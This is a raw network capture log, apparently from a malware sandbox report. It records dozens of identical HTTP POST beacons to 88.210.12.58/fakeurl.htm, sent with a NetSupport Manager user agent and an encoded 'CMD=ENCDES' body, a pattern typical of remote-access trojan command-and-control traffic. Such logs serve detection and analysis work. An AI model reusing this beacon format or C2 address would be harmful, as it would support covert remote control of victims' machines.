Dec 10, 2024 09:00:23.406086922 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.508799076 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.608809948 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.709568024 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:23.813445091 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.017615080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.322082043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.422169924 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.523092985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.623119116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.724088907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.824120998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:24.925092936 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.025064945 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.126076937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.225061893 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.328788042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.428666115 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.528789997 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.628793001 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.728794098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.828071117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:25.929052114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.030117035 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.131170988 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.232203007 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.332170010 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.433191061 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.534063101 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.635077000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.840866089 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:26.944544077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.049700022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.150075912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.250288963 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.352797031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.451244116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.551223040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.651092052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.752798080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.852072001 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:27.953201056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.053153038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.154144049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.255101919 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.356085062 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.456165075 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.556107044 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.656073093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.756117105 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.857126951 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:28.957093954 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.057080984 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.158216953 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.260911942 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.360797882 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.462428093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.564810991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.772422075 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.880815029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:29.980811119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.080110073 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.180119038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.281220913 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.382163048 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.483114004 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.583100080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.684195042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.785100937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.885107040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:30.986131907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.089812994 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.190119982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.292390108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.392811060 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.492810965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.592803955 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.692152977 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.793143034 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.894123077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:31.995093107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.097640991 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.198117971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.299101114 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.400142908 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.501111984 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.601068974 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.702069998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.802108049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:32.903088093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.003113031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.104115963 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.204247952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
